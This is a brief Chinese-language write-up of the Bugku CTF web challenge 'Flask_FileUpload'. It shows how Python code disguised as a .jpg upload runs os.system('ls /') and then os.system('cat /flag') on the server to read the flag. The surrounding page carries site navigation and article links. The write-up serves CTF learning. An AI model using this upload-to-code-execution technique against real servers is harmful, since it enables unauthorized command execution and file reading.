技术栈

Bugku-web-Flask_FileUpload

黑白时光les2024-08-01 11:52

Bugku-web-Flask_FileUpload

查看源代码,提示用python返回结果

在file.jpg中写python代码

复制代码
import os
os.system('ls / ')

上传后查看源代码,找到flag文件夹

修改代码

复制代码
import os
os.system('cat /flag ')
上一篇:Python面试题:如何使用WebSocket实现实时Web应用
下一篇:单片机之串口通信协议
相关推荐
梦650
1 分钟前
JavaScript ES5 + ES6+ 字符串 (String) 所有方法大全
前端·javascript·es6
馨谙
10 分钟前
面试题----用户,组,su,su-,sudo,sudo-,nologin shell
java·前端·数据库
cuckooman
13 分钟前
uv设置国内源
python·pip·uv·镜像源
一见
21 分钟前
如何安装 dlib 和 OpenCV(不带 Python 绑定)
人工智能·python·opencv
王同学 学出来
26 分钟前
React案例实操(二)
前端·react.js·前端框架
weixin_42777161
37 分钟前
Vite 与 Webpack 模块解析差异
前端·webpack·node.js
永远是我的最爱
39 分钟前
基于ASP.NET的图书管理系统的设计与实现
前端·后端·sql·visual studio
广州华水科技
1 小时前
单北斗GNSS技术在变形监测中的应用及其位移监测优势解析
前端
刘晓倩
1 小时前
Python内置函数-hasattr()
前端·javascript·python
逆境清醒
1 小时前
Python中的常量
开发语言·python·青少年编程
热门推荐
01GitHub 镜像站点02Linux下V2Ray安装配置指南032025年大语言模型技术全景报告04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05Labelme从安装到标注:零基础完整指南06Claude Code Skills 实用使用手册07UV安装并设置国内源08AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南09在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)10BongoCat - 跨平台键盘猫动画工具